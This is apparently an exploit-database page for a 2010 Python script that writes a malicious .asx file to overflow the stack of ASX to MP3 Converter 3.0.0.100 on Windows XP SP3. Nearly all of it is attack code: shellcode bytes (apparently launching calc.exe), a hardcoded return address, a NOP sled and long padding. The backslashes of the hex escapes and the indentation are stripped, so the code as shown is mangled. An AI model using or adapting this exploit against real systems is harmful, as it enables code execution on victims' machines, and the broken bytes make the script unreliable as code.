ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit
# Published : 2010-03-30
# Author : Hazem Mofeed
# Previous Title : Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
# Next Title : Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit

#!/usr/bin/python

import time
# ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit
# Author: Hazem Mofeed
# PoC: http://www.exploit-db.com/exploits/11930
# Tested On: Windows Xp Home Edition SP3
# Home: http://hakxer.wordpress.com

print ' Exploited by Hazem Mofeed n'
print ' ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit n'

print ' building exploit ..........'

time.sleep(3)

shellcode = ("xebx16x5bx31xc0x50x53xbbx0dx25x86x7cxffxd3x31xc0"
"x50xbbx12xcbx81x7cxffxd3xe8xe5xffxffxffx63x61x6c"
"x63x2ex65x78x65")

ret = "x08x6Ax83x7C"
null = "x90" * 10
exploit = ("http://" + "x41" * 26117 + ret + null + shellcode )
try:
file = open("exploit.asx","w")
file.write(exploit)
file.close()
except:
print ' failed '